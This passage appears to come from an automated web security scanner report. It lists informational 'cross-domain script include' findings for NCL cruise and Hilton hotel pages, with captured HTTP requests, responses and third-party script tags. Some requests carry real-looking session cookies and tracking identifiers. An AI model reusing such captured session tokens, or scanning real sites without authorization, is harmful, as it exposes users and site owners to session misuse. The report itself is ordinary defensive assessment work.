<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type='text/javascript' src='http://vdassets.bitgravity.com/api/script'></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" media="all" href="http://www2.ncl.com/sites/default/files/css/css_62d4c50a516856ffc95c16bfb73372a9.css" />
<script src="http://s7.addthis.com/js/250/addthis_widget.js#username=NCL"></script>
...[SNIP]...
18.53. http://www2.ncl.com/freestyle-cruise/freestyle-dining  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/freestyle-dining

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /freestyle-cruise/freestyle-dining HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317632141-1"
Last-Modified: Mon, 03 Oct 2011 08:55:41 +0000
X-Ncl-SLog: 10.5.44.31
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:43 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:43 GMT; path=/; domain=ncl.com
Content-Length: 47025

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type='text/javascript' src='http://vdassets.bitgravity.com/api/script'></script>
...[SNIP]...
18.54. http://www2.ncl.com/freestyle-cruise/freestyle-family-fun/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/freestyle-family-fun/overview

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /freestyle-cruise/freestyle-family-fun/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 11:29:26 +0000
ETag: "1317641366-1"
X-Ncl-SLog: 10.5.44.32
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:50 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:50 GMT; path=/; domain=ncl.com
Content-Length: 46071

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type='text/javascript' src='http://vdassets.bitgravity.com/api/script'></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" media="all" href="http://www2.ncl.com/sites/default/files/css/css_debb7df6221f75e4b9e53cc5c28a4aac.css" />
<script src="http://s7.addthis.com/js/250/addthis_widget.js#username=NCL"></script>
...[SNIP]...
<div style="padding: 0px 0px 0px 8px">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
18.55. http://www2.ncl.com/freestyle-cruise/golf/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/golf/overview

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /freestyle-cruise/golf/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317633060-1"
Last-Modified: Mon, 03 Oct 2011 09:11:00 +0000
X-Ncl-SLog: 10.5.44.31
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:06:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:03 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:03 GMT; path=/; domain=ncl.com
Content-Length: 44665

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type='text/javascript' src='http://vdassets.bitgravity.com/api/script'></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" media="all" href="http://www2.ncl.com/sites/default/files/css/css_debb7df6221f75e4b9e53cc5c28a4aac.css" />
<script src="http://s7.addthis.com/js/250/addthis_widget.js#username=NCL"></script>
...[SNIP]...
18.56. http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/hawaii-cruise-and-hotel-packages

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /freestyle-cruise/hawaii-cruise-and-hotel-packages HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www2.ncl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; Cookie=R4252675302; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.1.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; s_pers=%20s_nr%3D1317646081809-New%7C1320238081809%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: HIT
ETag: "1317631959-1"
Last-Modified: Mon, 03 Oct 2011 08:52:39 +0000
X-Ncl-SLog: 10.5.44.33
Content-Type: text/html; charset=utf-8
Content-Length: 46432
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 12:47:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 12:47:41 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 12:47:41 GMT; path=/; domain=ncl.com

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type='text/javascript' src='http://vdassets.bitgravity.com/api/script'></script>
...[SNIP]...
18.57. http://www2.ncl.com/freestyle-cruise/nickelodeon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/nickelodeon

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /freestyle-cruise/nickelodeon HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: HIT
ETag: "1317630718-1"
Last-Modified: Mon, 03 Oct 2011 08:31:58 +0000
X-Ncl-SLog: 10.5.44.33
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:55 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:55 GMT; path=/; domain=ncl.com
Content-Length: 43466

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type='text/javascript' src='http://vdassets.bitgravity.com/api/script'></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" media="all" href="http://www2.ncl.com/sites/default/files/css/css_debb7df6221f75e4b9e53cc5c28a4aac.css" />
<script src="http://s7.addthis.com/js/250/addthis_widget.js#username=NCL"></script>
...[SNIP]...
18.58. http://www2.ncl.com/freestyle-cruise/onboard-experience  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/onboard-experience

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /freestyle-cruise/onboard-experience HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317630975-1"
Last-Modified: Mon, 03 Oct 2011 08:36:15 +0000
X-Ncl-SLog: 10.5.44.28
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:47 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:47 GMT; path=/; domain=ncl.com
Content-Length: 48855

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type='text/javascript' src='http://vdassets.bitgravity.com/api/script'></script>
...[SNIP]...
18.59. http://www2.ncl.com/freestyle-cruise/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/overview

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /freestyle-cruise/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317634785-1"
Last-Modified: Mon, 03 Oct 2011 09:39:45 +0000
X-Ncl-SLog: 10.5.44.32
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:41 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:41 GMT; path=/; domain=ncl.com
Content-Length: 43089

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type='text/javascript' src='http://vdassets.bitgravity.com/api/script'></script>
...[SNIP]...
18.60. http://www2.ncl.com/freestyle-cruise/spa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/spa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /freestyle-cruise/spa HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: HIT
ETag: "1317640158-1"
Last-Modified: Mon, 03 Oct 2011 11:09:18 +0000
X-Ncl-SLog: 10.5.44.33
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:06:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:16 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:16 GMT; path=/; domain=ncl.com
Content-Length: 56334

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type='text/javascript' src='http://vdassets.bitgravity.com/api/script'></script>
...[SNIP]...
<div style="padding: 0px 0px 0px 8px">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
18.61. http://www2.ncl.com/freestyle-cruise/spa-sports-and-fitness  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/spa-sports-and-fitness

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /freestyle-cruise/spa-sports-and-fitness HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317633921-1"
Last-Modified: Mon, 03 Oct 2011 09:25:21 +0000
X-Ncl-SLog: 10.5.44.32
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:54 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:54 GMT; path=/; domain=ncl.com
Content-Length: 41946

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type='text/javascript' src='http://vdassets.bitgravity.com/api/script'></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" media="all" href="http://www2.ncl.com/sites/default/files/css/css_debb7df6221f75e4b9e53cc5c28a4aac.css" />
<script src="http://s7.addthis.com/js/250/addthis_widget.js#username=NCL"></script>
...[SNIP]...
18.62. http://www2.ncl.com/ncl_inside_scoop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /ncl_inside_scoop

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ncl_inside_scoop HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; Cookie=R4252675302; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; s_pers=%20s_nr%3D1317646086034-New%7C1320238086034%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.2.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317645006-1"
Cache-Control: public, max-age=0
Last-Modified: Mon, 03 Oct 2011 12:30:06 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
X-Ncl-SLog: 10.5.44.31
Content-Length: 7543
Content-Type: text/html; charset=utf-8
Date: Mon, 03 Oct 2011 12:47:48 GMT
Connection: close
Set-Cookie: Cookie=R4252675302; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 12:47:48 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 12:47:48 GMT; path=/; domain=ncl.com

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<link type="text/css" rel="stylesheet" media="all" href="http://www2.ncl.com/sites/default/files/css/css_a5a87cfdda3ae627e62f84a5722cdc15.css" />
   <script src="http://s7.addthis.com/js/250/addthis_widget.js#username=NCL"></script>
...[SNIP]...
18.63. http://www2.ncl.com/sitemap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /sitemap

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sitemap HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: HIT
ETag: "1317645618-1"
Cache-Control: public, max-age=0
Last-Modified: Mon, 03 Oct 2011 12:40:18 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
X-Ncl-SLog: 10.5.44.33
Content-Type: text/html; charset=utf-8
Vary: Cookie
Date: Mon, 03 Oct 2011 13:05:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:41 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:41 GMT; path=/; domain=ncl.com
Content-Length: 59876

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type='text/javascript' src='http://vdassets.bitgravity.com/api/script'></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" media="all" href="http://www2.ncl.com/sites/default/files/css/css_92d228ade2767e9f3a2f2c55beb111f4.css" />
<script src="http://s7.addthis.com/js/250/addthis_widget.js#username=NCL"></script>
...[SNIP]...
18.64. http://www2.ncl.com/sites/default/files/js/js_97f1d6eea35366a16399aa1c4828dd79.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /sites/default/files/js/js_97f1d6eea35366a16399aa1c4828dd79.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sites/default/files/js/js_97f1d6eea35366a16399aa1c4828dd79.js HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www2.ncl.com/cruise-destinations
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; Cookie=R4252675302; s_pers=%20s_nr%3D1317646123362-New%7C1320238123362%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packa%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fcbooking%2525252FsubmitCruiseDetailsForm.html%2525253FpackageId%2525253D1912713%25252526itineraryCode%2525253D1581%252526ot%25253DA%3B; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.6.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_nr=1317646297776; s_sq=nclcom%3D%2526pid%253Dcbooking%25253A%252520bookingfunnel%25253A%252520cbooking%25253A%252520get%252520started%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww2.ncl.com%25252Fcruise-destinations%2526ot%253DA; ak_location=US,CA,SANJOSE,807; Ncl_region=CA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 02 Oct 2011 19:31:53 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Ncl-SLog: (null)
Content-Type: application/x-javascript
Content-Length: 639880
Cache-Control: max-age=51103
Expires: Tue, 04 Oct 2011 03:02:59 GMT
Date: Mon, 03 Oct 2011 12:51:16 GMT
Connection: close

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
s) {
var lastItem = $($(items[tipsToShow-1]).children()[0]);
lastItem.addClass("tips-last-item");
}
});
},

init_admin_atlas: function () {
$('#admin-menu').append('<script language="JavaScript" src="http://switch.atdmt.com/jaction/astnc1_Ships_6"></script>
...[SNIP]...
18.65. https://www2.ncl.com/vacations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ncl.com
Path:   /vacations

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /vacations HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 13:02:52 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1317646972"
X-Ncl-SLog: 10.5.44.30
Content-Type: text/html; charset=utf-8
Date: Mon, 03 Oct 2011 13:02:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Cookie=R1788641230; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:02:53 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:02:53 GMT; path=/; domain=ncl.com
Content-Length: 195543

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type='text/javascript' src='http://vdassets.bitgravity.com/api/script'></script>
...[SNIP]...
18.66. http://www3.hilton.com/en_US/hi/search/findhotels/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /en_US/hi/search/findhotels/index.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en_US/hi/search/findhotels/index.htm HTTP/1.1
Host: www3.hilton.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmid=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.tst=0.840; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635669022:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 44413
Date: Mon, 03 Oct 2011 12:54:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.hotelicopter.com/js/connector.js"></script>
...[SNIP]...
18.67. http://www3.hilton.com/en_US/hi/search/findhotels/results.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /en_US/hi/search/findhotels/results.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en_US/hi/search/findhotels/results.htm?view=LIST HTTP/1.1
Host: www3.hilton.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; mmcore.tst=0.544; mmid=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635584777:ss=1317635584777; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 257222
Date: Mon, 03 Oct 2011 12:52:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
